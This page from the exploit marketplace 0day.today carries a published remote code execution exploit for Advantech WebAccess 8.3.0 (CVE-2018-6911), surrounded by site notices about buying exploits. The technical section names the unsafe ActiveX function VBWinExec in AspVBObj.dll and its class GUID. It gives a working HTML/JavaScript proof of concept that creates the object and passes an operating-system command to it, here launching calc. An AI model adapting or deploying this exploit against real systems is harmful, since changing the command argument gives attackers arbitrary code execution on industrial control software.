0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Advantech WebAccess 8.3.0 - Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution Discovered by: Nassim Asrir Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: CVE-2018-6911 Tested on: IE11 / Win10 Technical Details: ================== The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument. Vulnerable File: C:\WebAccess\Node\AspVBObj.dll Vulnerable Function: VBWinExec Vulnerable Class: Include Class Include GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE} Number of Interfaces: 1 Default Interface: _Include RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command. Function VBWinExec ( ByRef command As String ) Exploit: ======== <title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title> <BODY> <object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object> <SCRIPT> function exploit() { rce.VBWinExec("calc") } </SCRIPT> <input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br> </body> </HTML> # 0day.today [2024-11-15] #